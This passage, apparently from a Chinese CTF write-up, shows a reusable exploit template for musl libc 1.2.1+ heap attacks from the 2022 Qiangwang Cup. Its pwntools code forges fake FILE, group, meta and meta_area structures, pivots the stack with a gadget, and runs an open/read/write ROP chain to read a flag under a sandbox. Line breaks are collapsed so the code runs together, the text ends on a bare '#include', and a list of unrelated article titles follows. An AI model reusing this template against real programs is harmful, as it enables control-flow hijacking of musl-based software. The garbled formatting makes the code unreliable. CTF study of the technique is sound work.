<< 5) | (sizeclass << 6) | (sizeclass << 12))fake_meta_area = p64(leak_secret) + fake_metapayload = ''payload += fake_filepayload += fake_grouppayload = payload.ljust(rop_addr - payload_addr, '\x00') # fake chunkpayload += ropassert len(payload) <= fake_meta_area_offsetpayload = payload.ljust(fake_meta_area_offset, '\x00')payload += fake_meta_areapayload = payload.ljust(0x2000, '\x00')fake_node = ''fake_node += p64(4)# idfake_node += p64(fake_chunk_addr)# name -> fake chunkfake_node += p64(0x100)# name_sizefake_node += p64(2)# typefake_node += p64(0xdeadbeef)# fafake_node += p64(0)# lsfake_node += p64(0)# rsadd(5, fake_node)add(6, payload)
而在有沙箱保护的情况下,需要进行 orw。
对于 musl-1.2.1 及以上版本,可以通过如下实现栈迁移和程序流劫持 。
mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
总结来说,就是在有沙箱时,需要修改结构体的 3 个地方:
常用模板如下(2022强网杯):
payload_addr = libc.address - 0x6fe0fake_file_addr = payload_addrfake_group_addr = fake_file_addr + 0x90fake_chunk_addr = fake_group_addr + 0x10fake_meta_area_offset = ((payload_addr + 0xFFF) & ~0xFFF) - payload_addrfake_meta_offset = fake_meta_area_offset + 8fake_meta_addr = payload_addr + fake_meta_offsetstderr_used_addr = libc.address + 0xb43a0rop_addr = fake_chunk_addrmagic_gadget = libc.search(asm('mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]'), executable=True).next()pop_rdi_ret = libc.search(asm("pop rdi;ret"), executable=True).next()pop_rsi_ret = libc.search(asm("pop rsi;ret"), executable=True).next()pop_rdx_ret = libc.search(asm("pop rdx;ret"), executable=True).next()pop_rax_ret = libc.search(asm("pop rax;ret"), executable=True).next()ret = libc.search(asm("ret"), executable=True).next()buf_addr = payload_addrrop = ''rop += p64(pop_rdi_ret)rop += p64(buf_addr)rop += p64(pop_rsi_ret)rop += p64(0)rop += p64(libc.sym['open'])rop += p64(pop_rdi_ret)rop += p64(3)rop += p64(pop_rsi_ret)rop += p64(buf_addr)rop += p64(pop_rdx_ret)rop += p64(0x100)rop += p64(libc.sym['read'])rop += p64(pop_rdi_ret)rop += p64(1)rop += p64(pop_rsi_ret)rop += p64(buf_addr)rop += p64(pop_rdx_ret)rop += p64(0x100)rop += p64(libc.sym['write'])fake_file = ""fake_file += "./flag".ljust(8, '\x00')# flagsfake_file += p64(0)# rposfake_file += p64(0)# rendfake_file += p64(0)# closefake_file += p64(0)# wendfake_file += p64(0)# wposfake_file += p64(rop_addr)# mustbezero_1fake_file += p64(ret)# wbasefake_file += p64(0)# readfake_file += p64(magic_gadget)# writefake_file = fake_file.ljust(0x90, '\x00')# lock = 0fake_group = p64(fake_meta_addr) + p64(0)fake_meta = ''fake_meta += p64(fake_file_addr)# prevfake_meta += p64(stderr_used_addr)# nextfake_meta += p64(fake_group_addr)# memfake_meta += p32(0b0000)# avail_maskfake_meta += p32(0b1110)# freed_masklast_idx = 3freeable = 1sizeclass = 8maplen = 0fake_meta += p64(last_idx | (freeable << 5) | (sizeclass << 6) | (sizeclass << 12))fake_meta_area = p64(leak_secret) + fake_metapayload = ''payload += fake_filepayload += fake_grouppayload += ropassert len(payload) <= fake_meta_area_offsetpayload = payload.ljust(fake_meta_area_offset, '\x00')payload += fake_meta_areapayload = payload.ljust(0x2000, '\x00')fake_node = ''fake_node += p64(4)# idfake_node += p64(fake_chunk_addr)# name -> fake chunkfake_node += p64(0x100)# name_sizefake_node += p64(2)# typefake_node += p64(0xdeadbeef)# fafake_node += p64(0)# lsfake_node += p64(0)# rsadd(5, fake_node)add(6, payload)
poc 如下:
#include
- android 打包混淆,debug可以正常使用,混淆正式包就一点就崩
- 榆钱树怎么吃
- Chrome 调试工具【DevTools】详解
- vscode调试HTML的js文件
- 使用Instrument调试界面卡顿
- 客所思声卡调试 客所思声卡调试qq号
- 射频放大器-低噪声放大器
- hbuildX运行uniapp项目到andiord真机调试
- 微信公众号开发调试之内网穿透
- Vue的学习笔记二:万里长征第一步~Vue调试工具安装